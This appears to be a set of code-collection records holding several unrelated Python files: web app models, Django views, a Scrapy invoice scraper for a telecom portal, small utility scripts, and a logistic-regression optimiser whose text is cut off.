\"http://www.gravatar.com/avatar/\" + hashlib.md5(gravatar_email.lower()).hexdigest() + \"?\" + urllib.urlencode({'d':default_image, 's':str(large_size)})\n }\n if include_private_data:\n user['email'] = email\n\n return user\n\ndef get_display_name_for_youtify_user_model(youtify_user_model):\n if youtify_user_model.first_name and youtify_user_model.last_name:\n return youtify_user_model.first_name + ' ' + youtify_user_model.last_name\n elif youtify_user_model.first_name:\n return youtify_user_model.first_name\n elif youtify_user_model.nickname:\n return youtify_user_model.nickname\n if youtify_user_model.google_user2:\n return youtify_user_model.google_user2.nickname().split('@')[0] # don't leak users email\n else:\n return youtify_user_model.google_user.nickname().split('@')[0] # don't leak users email\n\ndef get_url_for_youtify_user_model(youtify_user_model):\n if youtify_user_model.nickname:\n return 'http://www.youtify.com/' + youtify_user_model.nickname\n return 'http://www.youtify.com/users/' + str(youtify_user_model.key().id())\n\ndef get_playlist_structs_for_youtify_user_model(youtify_user_model, include_private_playlists=False):\n playlist_structs = []\n\n for playlist_model in db.get(youtify_user_model.playlists):\n if (not playlist_model.private) or include_private_playlists:\n 
playlist_structs.append(get_playlist_struct_from_playlist_model(playlist_model))\n\n for playlist_model in db.get(youtify_user_model.playlist_subscriptions):\n if playlist_model is not None:\n playlist_structs.append(get_playlist_struct_from_playlist_model(playlist_model))\n else:\n logging.error('User %s subscribes to deleted playlist' % (youtify_user_model.key().id()))\n\n return playlist_structs\n\ndef get_playlist_overview_structs(youtify_user_model, include_private_playlists=False):\n playlist_structs = []\n owner = get_youtify_user_struct(youtify_user_model)\n\n for playlist_model in db.get(youtify_user_model.playlists):\n if (not playlist_model.private) or include_private_playlists:\n playlist_structs.append({\n 'title': playlist_model.title,\n 'remoteId': playlist_model.key().id(),\n 'isPrivate': playlist_model.private,\n 'owner': owner,\n 'isLoaded': False\n })\n\n for playlist_model in db.get(youtify_user_model.playlist_subscriptions):\n if playlist_model is not None:\n playlist_structs.append({\n 'title': playlist_model.title,\n 'remoteId': playlist_model.key().id(),\n 'isPrivate': playlist_model.private,\n 'owner': get_youtify_user_struct(playlist_model.owner),\n 'isLoaded': False\n })\n\n return playlist_structs\n\ndef get_playlist_structs_by_id(playlist_id):\n playlist_model = Playlist.get_by_id(int(playlist_id))\n return get_playlist_struct_from_playlist_model(playlist_model)\n\ndef get_playlist_struct_from_playlist_model(playlist_model):\n playlist_struct = {\n 'title': playlist_model.title,\n 'videos': playlist_model.tracks_json,\n 'remoteId': playlist_model.key().id(),\n 'isPrivate': playlist_model.private,\n 'owner': get_youtify_user_struct(playlist_model.owner),\n 'followers': [],\n 'favorite': playlist_model.favorite\n }\n\n for key in playlist_model.followers:\n youtify_user_model = db.get(key)\n playlist_struct['followers'].append(get_youtify_user_struct(youtify_user_model))\n\n return playlist_struct\n\ndef get_activities_structs(youtify_user_model, verbs=None, type=None, count=None):\n query = Activity.all()\n\n if youtify_user_model:\n query = query.filter('owner =', youtify_user_model)\n\n if verbs:\n query = query.filter('verb IN', verbs)\n\n if type:\n query = query.filter('type =', type)\n\n query = query.order('-timestamp')\n\n if count is not None:\n query = query.fetch(count)\n\n ret = []\n\n for m in query:\n ret.append({\n 'timestamp': m.timestamp.strftime('%s'),\n 'verb': m.verb,\n 'type': m.type,\n 'actor': m.actor,\n 'target': m.target,\n })\n\n return ret\n\ndef get_settings_struct_for_youtify_user_model(youtify_user_model):\n return {\n 'lastfm_scrobble_automatically': youtify_user_model.lastfm_scrobble_automatically,\n 'send_new_follower_email': youtify_user_model.send_new_follower_email,\n 'send_new_subscriber_email': youtify_user_model.send_new_subscriber_email\n }\n\ndef get_external_user_subscription_struct(m, last_viewed=0):\n return {\n 'type': m.type,\n 'external_user_id': m.external_user_id,\n 'username': m.username,\n 'avatar_url': m.avatar_url,\n 'last_updated': mktime(m.last_updated.timetuple()),\n 'last_viewed': last_viewed,\n }\n\ndef get_external_user_subscriptions_struct_for_youtify_user_model(youtify_user_model):\n ret = []\n\n for external_user_model in db.get(youtify_user_model.external_user_subscriptions):\n last_viewed = ExternalUserTimestamp.all().filter('external_user =', external_user_model).filter('user =', youtify_user_model).get();\n last_viewed_ms = 0\n if last_viewed:\n last_viewed_ms = 
mktime(last_viewed.last_viewed.timetuple())\n ret.append(get_external_user_subscription_struct(external_user_model, last_viewed_ms))\n\n return ret\n\ndef generate_device_token():\n return str(random.random())\n\ndef get_alternative_struct(alternative_model):\n return {\n 'track_id': alternative_model.track_id,\n 'track_type': alternative_model.track_type,\n 'replacement_for_id': alternative_model.replacement_for_id,\n 'replacement_for_type': alternative_model.replacement_for_type,\n 'vote': alternative_model.vote\n }","repo_name":"youtify/youtify","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":12537,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"84"} +{"seq_id":"13858610444","text":"# coding:utf8\n\"\"\"\n--------------------------------------------------------------------------\n File: readcsv.py\n Auth: zsdostar\n Date: 2018/1/4 21:45\n Sys: Windows 10\n--------------------------------------------------------------------------\n Desc: 读写CSV的常见函数。。就是csv库的方法每次next读一行,写也是可以写一行\n 刘硕老师举的例子的URL已经没了,估计雅虎要亡了吧,\n 结构已经知道了,懒得再弄别的CSV文件了\n--------------------------------------------------------------------------\n\"\"\"\n__author__ = 'zsdostar'\n\nfrom urllib import urlretrieve\n\n# 这个接口已经没有了。。。就随便记录一下吧\nurlretrieve('http://table.finance.yahoo.com/table.csv?s=000001.sz', 'pingan.csv')\n\nimport csv\n\nwith open('pingan.csv', 'rb') as rf:\n # 这个reader是一个迭代器 只能通过next或者for循环进行迭代\n reader = csv.reader(rf)\n with open('pingan_copy.csv', 'wb') as wf:\n writer = csv.writer(wf)\n writer.writerow(reader.next()) # 其实这里的每个next返回的是一个list\n for row in reader:\n if row[0] < '2016-01-01':\n break\n if int(row[5]) >= 50000000:\n writer.writerow(row)\n","repo_name":"MisakaBit/PyFiles","sub_path":"Course-SeniorPy/Chapter6Python读写取各个类型的文件专题(csv,xml,json,xls)/RWcsv.py","file_name":"RWcsv.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"12166942151","text":"import math\n\n\ndef desordem(n, m):\n if (n == 0) or (m == 0):\n return 0\n p1 = n/(n+m)\n p2 = m/(n+m)\n return - p1 * math.log2(p1) - p2 * math.log2(p2)\n\n\n\ndef main():\n n = int(input(\"Indique o nº de objetos do 1º tipo: \"))\n m = int(input(\"Indique o nº de objetos do 2º tipo: \"))\n print(\"A desordem do conjunto é %.2f.\" %(desordem(n, m)))\n\n\nif __name__ == '__main__':\n main()","repo_name":"MiguelFaria57/IPPS-Resolution_of_Problems_using_Python","sub_path":"src/Exercises3/Ex3_7.py","file_name":"Ex3_7.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"12710921943","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nfrom PIL import Image\r\nimport math\r\nimport operator\r\nfrom functools import reduce\r\n\r\n\r\nsrcdir = './data/轿车360'\r\n\r\ndef compare(pic1,pic2):\r\n '''\r\n :param pic1: 图片1路径\r\n :param pic2: 图片2路径\r\n :return: 返回对比的结果\r\n '''\r\n image1 = Image.open(pic1)\r\n image2 = Image.open(pic2)\r\n\r\n histogram1 = image1.histogram()\r\n histogram2 = image2.histogram()\r\n\r\n differ = math.sqrt(reduce(operator.add, list(map(lambda a,b: (a-b)**2,histogram1, histogram2)))/len(histogram1))\r\n\r\n return differ\r\n# image1 = cv2.imread(file1)\r\n# image2 = cv2.imread(file2)\r\n# difference = cv2.subtract(image1, image2)\r\n# result = not np.any(difference) #if difference is all zeros it will return False\r\nfilelist = os.listdir(srcdir) 
#列出文件夹下所有的目录与文件\r\nfilelist.sort(key=lambda x:int(x[:-4]))\r\na = filelist[1]\r\nlens = len(filelist)\r\nfor i in range(0,lens):\r\n    path = os.path.join(srcdir,filelist[i])\r\n    path = path.replace('\\\\', '/')\r\n    # cur = cv2.imread(path)\r\n    for j in range(i+1,lens):\r\n        path1 = os.path.join(srcdir,filelist[j])\r\n        path1 = path1.replace('\\\\', '/')\r\n        # other = cv2.imread(path1)\r\n        if os.path.isfile(path) and os.path.isfile(path1):\r\n            if compare(path,path1) == 0:\r\n                print(path1)\r\n                os.remove(path1)\r\n\r\n","repo_name":"Maplesotrys/recapphoto_detect","sub_path":"detectsame.py","file_name":"detectsame.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"}
+{"seq_id":"25006180336","text":"from contextlib import suppress\nimport re\n\ndef add(string):\n\tsplitted_string = re.split(r'[,\\n]', string)\n\n\toutcome = 0\n\tfor string_number in splitted_string:\n\t\twith suppress(ValueError):\n\t\t\toutcome += float(string_number)\n\treturn '{:.0f}'.format(outcome)\n\t","repo_name":"thehyve/coding-dojo","sub_path":"dojo-3-string-calc/string_calc.py","file_name":"string_calc.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"}
+{"seq_id":"30396109051","text":"from typing import List\n\nfrom asyncpg import exceptions\n\nfrom . import utils\nfrom .tables import Question\n\n\nasync def save_qestions(questions: List[dict]) -> None:\n    repeated_questions = 0\n    for question in questions:\n        try:\n            new_question = Question(\n                {\n                    Question.number: question['id'],\n                    Question.text: question['question'],\n                    Question.answer: question['answer'],\n                }\n            )\n            await new_question.save()\n        except exceptions.UniqueViolationError:\n            repeated_questions += 1\n\n    if repeated_questions:\n        await utils.fetch_questions(questions_num=repeated_questions)\n\n\nasync def get_questions_from_db(limit: int) -> List[dict]:\n    questions = await Question.select(\n        Question.number, Question.text, Question.answer).order_by(\n        Question.created_at, ascending=False).limit(limit)\n    return questions\n","repo_name":"CaDiBob/quiz","sub_path":"backend/questions/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
+{"seq_id":"39890996832","text":"from django.shortcuts import render, redirect\nfrom django.views.decorators.http import require_POST\nfrom django.urls import reverse\nfrom django.http import HttpResponseBadRequest\nfrom django.contrib import messages\nfrom ..models import Person\nfrom ...merge import compute_diff, merge\nfrom opencivicdata.core.models import Jurisdiction\n\n\ndef merge_tool(request, jur_id):\n    people = Person.objects \\\n        .filter(memberships__organization__jurisdiction__id=jur_id) \\\n        .distinct()\n    jur_name = Jurisdiction.objects.get(id=jur_id).name\n    if request.method == 'POST':\n        person1 = request.POST['person1']\n        person2 = request.POST['person2']\n\n        if person1 == person2:\n            messages.add_message(request, messages.ERROR,\n                                 'Cannot merge person with themselves.',\n                                 )\n            # return early so we never compute a diff of a person against themselves\n            return render(request, 'opencivicdata/admin/merge.html',\n                          {'people': people, 'jur_name': jur_name})\n        person1 = Person.objects.get(pk=person1)\n        person2 = Person.objects.get(pk=person2)\n\n        diff = compute_diff(person1, person2)\n\n        return render(request, 'opencivicdata/admin/merge.html',\n                      {'people': people,\n                       'person1': person1,\n                       'person2': person2,\n                       'diff': diff,\n                       'jur_name': jur_name,\n                      })\n    else:\n        return render(request, 
'opencivicdata/admin/merge.html',\n {'people': people, 'jur_name': jur_name})\n\n\n@require_POST\ndef merge_confirm(request):\n person1 = request.POST['person1']\n person2 = request.POST['person2']\n if person1 == person2:\n return HttpResponseBadRequest('invalid merge!')\n\n person1 = Person.objects.get(pk=person1)\n person2 = Person.objects.get(pk=person2)\n\n merge(person1, person2)\n\n messages.add_message(request, messages.INFO,\n 'merged {} with {}'.format(person1.id, person2.id)\n )\n\n return redirect(reverse('admin:core_person_change', args=(person1.id,)))\n","repo_name":"GovHawkDC/python-opencivicdata","sub_path":"opencivicdata/core/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"84"} +{"seq_id":"7130802240","text":"from HashTable import ChainingHashTable\r\nimport csv\r\n\r\n\r\n# creates 27-key hashtable and reads in data from location csv file\r\n# space-time complexity: O(N)\r\ndef create_location_table():\r\n loc_table = ChainingHashTable(27)\r\n with open('Distance Table.csv', newline='') as csvfile:\r\n reader = csv.reader(csvfile)\r\n next(reader)\r\n i = 0\r\n for row in reader:\r\n loc_id = i\r\n loc_description = row[0]\r\n distances = row[1:]\r\n\r\n key = loc_id\r\n value = loc_description, distances\r\n\r\n loc_table.insert(key, value)\r\n i += 1\r\n return loc_table\r\n\r\n\r\n# creates 27-key hashtable to associate packages with locations\r\n# space-time complexity: O(N)\r\ndef create_loc_package_table(loc_table, package_table):\r\n loc_pack_table = ChainingHashTable(27)\r\n for location in loc_table.table:\r\n for package in package_table.table:\r\n # checks matching street addresses between loc_table & package_table and populates loc_pack_table with\r\n # the resulting integers. 
Each location ID indexes a list of matching package IDs.\r\n if location[0][1][0] == package[0][1][1]:\r\n loc_pack_table.table[int(location[0][0])].append(int(package[0][0]))\r\n return loc_pack_table\r\n","repo_name":"danaklowe/TSP-Deliveries","sub_path":"Location.py","file_name":"Location.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"19838216982","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime as dt\nimport json\nimport os\nimport sys\nimport time\nimport urllib.parse\nimport uuid\n\nfrom scrapy import signals\nfrom scrapy.http import FormRequest, Request\nfrom scrapy_splash import SplashRequest, SplashFormRequest\nfrom websocket import create_connection\n\nfrom brobot_bots.external_modules.config import access_settings as config\nfrom brobot_bots.external_modules.external_functions import CustomSpider\nfrom brobot_bots.external_modules.lua_script import script, script_10_sec_wait\nfrom brobot_bots.items import BrobotBotsItem\n\n\npath = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nif not path in sys.path:\n sys.path.insert(1, path)\n#del path\n\n\nclass telecom_vivo_movel_spider(CustomSpider):\n # required scraper name\n name = \"telecom_vivo_movel\"\n\n start_url = 'https://mve.vivo.com.br'\n\n # user and password for splash\n http_user = config['SPLASH_USERNAME']\n http_pass = config['SPLASH_PASSWORD']\n\n @classmethod\n def from_crawler(cls, crawler, *args, **kwargs):\n \"\"\"Rewriting of the spider_idle function to yield result after spider closed.\"\"\"\n\n spider = super(telecom_vivo_movel_spider, cls).from_crawler(\n crawler, *args, **kwargs)\n crawler.signals.connect(spider.get_final_result, signals.spider_idle)\n return spider\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # internal arguments\n self.navigation_constraints = [\n item['cnpj'] for item in self.navigation_constraints] \\\n if self.navigation_constraints else []\n\n def start_requests(self):\n frm_data = {\"email\": self.e_mail,\n \"password\": self.senha}\n\n login_url = self.start_url + '/login/sign_in'\n yield SplashFormRequest(login_url, formdata=frm_data,\n callback=self.sign_in_me,\n errback=self.errback_func,\n endpoint='execute',\n cache_args=['lua_source'],\n args={'lua_source': script_10_sec_wait},\n dont_filter=True)\n\n def sign_in_me(self, response):\n error_message = response.selector.xpath(\n \"//span[contains(normalize-space(),'E-mail e/ou senha incorretos')]/text()\").get()\n if error_message:\n error_msg = {\"error_type\": \"WRONG_CREDENTIALS\",\n \"details\": error_message}\n self.errors.append(error_msg)\n self.logger.warning(error_msg)\n return\n\n dashboard_url = \"https://mve.vivo.com.br/dashboard\"\n yield Request(dashboard_url, callback=self.get_dashbord,\n cookies=response.data['cookies'],\n meta={'cookies': response.data['cookies']},\n dont_filter=True)\n\n def get_dashbord(self, response):\n print(response.url)\n\n documents = response.selector.xpath(\"//li[@data-documentnumber]/@data-documentnumber\").extract()\n for document in documents:\n if not self.navigation_constraints or \\\n document in self.navigation_constraints:\n current_time = str(time.time() * 1000)\n query_str = {\n 'documentNumber': document,\n 'customerPlatformType': 'mobile',\n 'offset': '0',\n 'limit': '20',\n 'ts': current_time}\n\n invoices_url = \"https://mve.vivo.com.br/module/invoices/list/summary?\" + 
urllib.parse.urlencode(query_str)\n yield Request(invoices_url, headers={'x-document-number': document},\n callback=self.get_invoices,\n cookies=response.meta['cookies'],\n meta={'cookies': response.meta['cookies'],\n 'document': document},\n dont_filter=True)\n\n def get_invoices(self, response):\n cookies = response.meta['cookies']\n document = response.meta['document']\n cookie_string = \"; \".join([\"{}={}\".format(cookie['name'], cookie['value']) for cookie in cookies])\n\n json_response = json.loads(response.text)\n print(json_response)\n # add to result if not empty\n if json_response['due'] or json_response['paid'] or \\\n json_response['in_arrears'] or json_response['inactive']:\n self.result[document] = json_response\n\n if self.get_files:\n for invoice_status in ['due', 'in_arrears']:\n due_invoices = json_response[invoice_status]\n for invoice in due_invoices:\n billing_info = invoice['invoice']\n current_time = str(time.time() * 1000)\n due_date = dt.strptime(billing_info['paymentDueDate'], \"%Y-%m-%d\")\n account_status = invoice['billingAccountStatus']\n if account_status != \"cancelled\" and self.start_date <= due_date <= self.end_date:\n bills = [{\n \"billMonth\": invoice['billMonth'],\n \"billYear\": invoice['billYear'],\n \"billingAccountId\": invoice['billingAccountId'],\n \"cycleCode\": invoice['cycleCode'],\n \"dateFinalCycle\": invoice['dateFinalCycle'],\n \"documentId\": document, # document number\n \"originalInvoiceRefDueDate\": billing_info['paymentDueDate'],\n \"paymentStatus\": [billing_info['paymentStatus']],\n \"type\": \"detailed-invoice\"}]\n\n file_data = {\n \"filename\": document, # document number\n \"info\": \"{account_id}\\n - {due_date}\\n - Detalhada (.pdf)\".format(\n account_id=invoice['billingAccountId'], due_date=due_date.strftime(\"%d/%m/%Y\")),\n \"id\": document + current_time,\n \"documentNumber\": document, # document number\n \"type\": \"detailed-invoice\",\n \"fileFormat\": \"detailed-invoice\",\n \"requestFrom\": \"grid-invoices\",\n \"paymentStatusAnalytics\": [billing_info['paymentStatus']],\n \"downloadId\": document + current_time,\n \"status\": 2,\n \"bills\": bills,\n \"download\": bills}\n\n ws = create_connection(\"wss://mve.vivo.com.br/wss/file\",\n cookie=cookie_string)\n ws.send(json.dumps(file_data))\n ws_result = json.loads(ws.recv())\n ws.close()\n\n if ws_result.get('url'):\n pdf_url = \"https://mve.vivo.com.br{url_path}&vivo_download_token={download_token}\".format(\n url_path=ws_result['url'], download_token=ws_result['downloadToken'])\n print(pdf_url)\n yield Request(pdf_url, callback=self.save_pdf,\n meta={'document': document,\n 'invoice_status': invoice_status,\n 'invoice': invoice},\n cookies=cookies, dont_filter=True)\n\n def save_pdf(self, response):\n \"\"\"Function to save PDF for uploading to s3 bucket.\"\"\"\n\n if response.status != 200 and self.file_retries > 0:\n self.file_retries -= 1\n yield response.request.replace(dont_filter=True)\n return\n elif response.status != 200:\n return\n else:\n # refresh\n self.file_retries = 3\n\n # get metadata\n file_type = \"__boleto__\"\n invoice_status = response.meta['invoice_status']\n document = response.meta['document']\n\n # options to save pdf\n file_id = str(uuid.uuid4())\n filename = \"{file_id}.pdf\".format(file_id=file_id)\n file_path = os.path.join(path, \"downloads\", self.scrape_id, filename)\n with open(file_path, 'wb') as f:\n f.write(response.body)\n\n # upload pdf to s3 and call the webhook\n self.upload_file(file_id)\n\n # update values in result\n 
document_value = self.result[document]\n [item.update({\n file_type: {\n \"file_id\": file_id}\n }) for item in document_value[invoice_status]\n if item == response.meta['invoice']]\n self.result.update({document: document_value})\n\n def get_final_result(self, spider):\n \"\"\"Will be called before spider closed\n Used to save data_collected result.\"\"\"\n\n # stop crawling after yeild_item called\n if not self.result_received:\n # push to webhook\n self.data = {\n 'scrape_id': self.scrape_id,\n 'scraper_name': self.name,\n 'files_count': self.files_count,\n 'screenshots_count': self.screenshots_count,\n 'cnpj': self.cnpj}\n self.data.update({'result': self.result})\n if self.errors:\n self.data.update({'errors': self.unique_list(self.errors)})\n webhook_file_path = os.path.join(\n path, \"downloads\", self.scrape_id,\n '{cnpj}-data_collected.json'.format(cnpj=self.cpf_cnpj))\n self.data_collected(self.data, webhook_file_path)\n # return item for scrapinghub\n self.result_received = True\n req = Request(self.start_url,\n callback=self.yield_item,\n errback=self.yield_item, dont_filter=True)\n self.crawler.engine.crawl(req, spider)\n\n def yield_item(self, response):\n \"\"\"Function is using to yield Scrapy Item\n Required for us to see the result in ScrapingHub\"\"\"\n item = BrobotBotsItem()\n item.update(self.data)\n yield item\n","repo_name":"geeone/scrapy-spiders","sub_path":"brobot_bots/spiders/telecom_vivo_movel_spider.py","file_name":"telecom_vivo_movel_spider.py","file_ext":"py","file_size_in_byte":10416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"19158838489","text":"from rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom knowledge.serializers import CategorySerializer, KnowledgeSerializer\nfrom knowledge.models import Category, Knowledge\nfrom django.core.paginator import Paginator\nimport json\nfrom rest_framework import status\n\n\n# Create your views here.\nclass CategoriesView(APIView):\n def post(self, request):\n categories = Category.objects.all()\n serializer = CategorySerializer(categories, many=True)\n return Response({\n \"status\": 'success',\n \"articles\": serializer.data,\n })\n\n\nclass EditCategoryView(APIView):\n def post(self, request):\n\n # received_json_data = json.loads(request.body.decode(\"utf-8\"))\n received_json_data = request.data\n\n category_id = int(received_json_data['id'])\n name = str(received_json_data['name'])\n comment = str(received_json_data['comment'])\n description = str(received_json_data['description'])\n\n if category_id == 0:\n category = Category(name=name, comment=comment, description=description)\n else:\n category = Category.objects.get(id=category_id)\n category.name = name\n category.comment = comment\n category.description = description\n\n category.save()\n\n return Response({\n \"status\": 'success',\n })\n\n\nclass GetKnowledgeView(APIView):\n def post(self, request):\n\n # received_json_data = json.loads(request.data)\n received_json_data = request.data\n\n page_num = int(received_json_data['page'])\n category = int(received_json_data['category'])\n\n if page_num < 1:\n page_num = 1\n\n knowledge_objects = Knowledge.objects\n\n if category > 0:\n knowledge_objects = knowledge_objects.filter(category=category)\n else:\n knowledge_objects = knowledge_objects.all()\n\n paginate = Paginator(knowledge_objects, 5)\n\n page = paginate.page(page_num)\n\n knowledge = page.object_list\n\n serializer = 
KnowledgeSerializer(knowledge, many=True)\n\n        return Response({\n            \"status\": 'success',\n            \"knowledge\": serializer.data,\n            \"page\": page_num,\n            \"num_pages\": paginate.num_pages,\n        })\n\n\nclass GetKnowledgeDetailView(APIView):\n    def post(self, request):\n\n        received_json_data = request.data\n\n        knowledge_id = int(received_json_data['knowledge_id'])\n\n        result = None\n        if knowledge_id > 0:\n            knowledge = Knowledge.objects.get(id=knowledge_id)\n            serializer = KnowledgeSerializer(knowledge)\n            result = serializer.data\n\n        return Response({\n            \"status\": 'success',\n            \"knowledge\": result,\n            \"received_json_data\": received_json_data,\n        })\n\n\nclass SaveKnowledgeDetailView(APIView):\n    def post(self, request):\n\n        received_json_data = request.data\n\n        knowledge_id = int(received_json_data['knowledge_id'])\n        category_id = int(received_json_data['category_id'])\n        short_desc = str(received_json_data['short_description'])\n        text = str(received_json_data['knowledge_text'])\n\n        # filter().first() returns None for a missing category, so the guard below can fire\n        category = Category.objects.filter(id=category_id).first()\n\n        if not category:\n            return Response({\n                \"status\": 'fail',\n            })\n\n        result = None\n        saved_knowledge_id = 0\n        if knowledge_id == 0:\n            knowledge = Knowledge()\n        else:\n            knowledge = Knowledge.objects.filter(id=knowledge_id).first()\n\n        if knowledge:\n            knowledge.category = category\n            knowledge.short_desc = short_desc\n            knowledge.text = text\n            knowledge.save()\n            saved_knowledge_id = knowledge.id\n            # serializer = KnowledgeSerializer(knowledge)\n\n        return Response({\n            \"status\": 'success',\n            \"knowledge_id\": saved_knowledge_id,\n            # \"serializer\": serializer,\n            \"received_json_data\": received_json_data,\n        })\n","repo_name":"konstcos/knowledge_base","sub_path":"api_v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
+{"seq_id":"16817126399","text":"from math import sqrt\nfrom numpy.linalg import norm\nfrom ..base import less_equal\nimport numpy as np\nfrom scipy.sparse import csr_matrix #used below whenever sparse=True\n\n#计算海森矩阵与d的矩阵乘法\ndef hessian_dot(X_T_pos,X_T_neg,X_pos,X_neg,D,d,n_pos_free,hess_dot,d_index=None):\n\tif d_index is None:\n\t\td_index = n_pos_free\n\thess_dot[:n_pos_free] = X_T_pos.dot(D*X_pos.dot(d[:d_index])) - X_T_pos.dot(D*X_neg.dot(d[d_index:]))\n\thess_dot[n_pos_free:] = -X_T_neg.dot(D*X_pos.dot(d[:d_index])) + X_T_neg.dot(D*X_neg.dot(d[d_index:]))\n\n#共轭梯度算法求解论文式(53),见论文Algorithm 7\ndef CG(X_T_pos,X_T_neg,X_pos,X_neg,D,gradient_free,gradient_qd_free,hess_dot_d,d,n_pos_free,region_size,tol):\n\tb = -gradient_qd_free\n\tx,pre_x = np.zeros_like(d),np.zeros_like(d)\n\tr,p = b.copy(),b.copy() \n\tnorm2_square_r = np.sum(r**2)\n\tstop_criterion = tol**2*np.sum(gradient_free**2)\n\t\n\tA_dot_p = np.empty_like(d)\n\tfor _ in range(d.shape[0]):\n\t\thessian_dot(X_T_pos,X_T_neg,X_pos,X_neg,D,p,n_pos_free,A_dot_p)\n\t\talpha = norm2_square_r/np.dot(p,A_dot_p)\n\t\t\n\t\tx += alpha*p\n\t\tif norm(x+d)>region_size:\n\t\t\ta,b,c = np.sum(p**2),2*np.dot(pre_x+d,p),np.sum((pre_x+d)**2)-region_size**2\n\t\t\tdelta = b**2-4*a*c\n\t\t\tgamma = max((-b+sqrt(delta))/(2*a),(-b-sqrt(delta))/(2*a)) if delta>=0 else 0\n\t\t\treturn pre_x+gamma*p,True\n\t\tpre_x = x.copy()\n\t\t\n\t\tr -= alpha*A_dot_p\n\t\tnorm2_square_r_ = np.sum(r**2)\n\t\tif less_equal(norm2_square_r_,stop_criterion):\n\t\t\tbreak\n\n\t\tbeta = norm2_square_r_/norm2_square_r\n\t\tp *= beta\n\t\tp += r\n\t\tnorm2_square_r = norm2_square_r_\n\telse:\n\t\treturn x,True\n\treturn x,False\n\n\ndef 
TRON(X,y,w,sample_weights,C,sparse,conv_tol,max_iter,sigma=0.01,beta=0.9,eta0=1e-3,eta1=0.25,eta2=0.75,sigma1=0.25,sigma2=0.5,sigma3=4.0,max_region_size=1e10,zero_atol=1e-10):\n\t\"\"\"\n\t\tTRON算法。详细见论文<> 5.1节\n\t\t参数:\n\t\t\t①eta0,eta1,eta2,sigma1,sigma2,sigma3:浮点数。TRON算法用于权向量和region size的更新,具体见论文\n\t\t\t②max_region_size:浮点数,表示最大的region size。\n\t\"\"\"\n\tN,p = X.shape\n\tif sparse:\n\t\tX = csr_matrix(X)\n\t\tX_T = csr_matrix(X.T)\n\telse:\n\t\tX_T = X.T\n\t\n\tw_ = np.zeros(p*2,np.float64)\n\tif not w is None:\n\t\tpos_indices,neg_indices = w>0,w<0 \n\t\tw_[:p][pos_indices] = w[pos_indices]\n\t\tw_[p:][neg_indices] = w[neg_indices]\n\tw = w_\n\t\n\tC = C if sample_weights is None else C*sample_weights\n\n\texp_neg_Xy_dot_w = np.exp(-y*X.dot(w[:p]-w[p:]))\n\t\n\t#计算C*[σ(yw'x)-1]\n\tprobs_minus_one = (np.reciprocal(1+exp_neg_Xy_dot_w)-1)*C\n\t#计算C*{ σ(yw'x)*[1-σ(yw'x)] }\n\tD = np.reciprocal(exp_neg_Xy_dot_w+np.reciprocal(exp_neg_Xy_dot_w)+2.)*C\n\t#实际梯度为一长度为2p的向量,在这里我们只计算前p个元素组成的向量gradient\n\t#易得,实际梯度后p个元素组成的向量为-X_T.dot(probs_minus_one*y) + 1,即2-gradient\n\tgradient = X_T.dot(probs_minus_one*y) + 1\n\t\n\tloss = np.sum(C*np.log(exp_neg_Xy_dot_w+1)) + np.sum(w)\n\t#初始化∆为实际梯度的2-范数,见论文<>\n\tregion_size= sqrt( np.sum(gradient**2) + np.sum((2-gradient)**2) )\n\t\n\tcauchy_d = np.empty(p*2,np.float64)\n\tfor iter_index in range(max_iter):\n\t\tlambda_ = 1\n\t\t#利用线性搜索来计算cauchy point,见论文式(47)-(49)\n\t\twhile True:\n\t\t\tcauchy_d[:p] = np.clip(w[:p] - lambda_*(gradient),0,None) - w[:p]\n\t\t\tcauchy_d[p:] = np.clip(w[p:] - lambda_*(2-gradient),0,None) - w[p:]\n\t\t\t#计算实际梯度与cauchy_d的点积\n\t\t\tgradient_dot_d = np.dot(gradient,cauchy_d[:p]) + np.dot(2-gradient,cauchy_d[p:])\n\t\t\t#计算实际海森矩阵于cauchy_d的矩阵乘法\n\t\t\t#令H=X'DX,易得实际海森矩阵Hessian为\n\t\t\t# |\tH -H |\n\t\t\t# Hessian = | |\n\t\t\t# |\t-H H |\n\t\t\t#hess_dot_d = np.dot(| H -H |,cauchy_d)\n\t\t\t#易得,np.dot(Hessian,cauchy_d) = np.dot(cauchy_d[:p],hess_dot_d) - np.dot(cauchy_d[p:],hess_dot_d)\n\t\t\thess_dot_d = X_T.dot(D*X.dot(cauchy_d[:p])) - X_T.dot(D*X.dot(cauchy_d[p:]))\n\t\t\tqd = 0.5* ( np.dot(cauchy_d[:p],hess_dot_d) - np.dot(cauchy_d[p:],hess_dot_d) ) + gradient_dot_d\n\t\t\tcondition = gradient_dot_d\n\t\t\t\n\t\t\t#寻找满足qd <= sigma*condition且||cauchy_d||<=region_size的步长\n\t\t\tif less_equal(qd,sigma*condition) and less_equal(norm(cauchy_d),region_size):\n\t\t\t\tbreak\n\t\t\tlambda_ *= beta\n\n\t\tw_,d = w+cauchy_d,cauchy_d\n\t\t#计算F(cauchy_point)\n\t\tfree_indices = 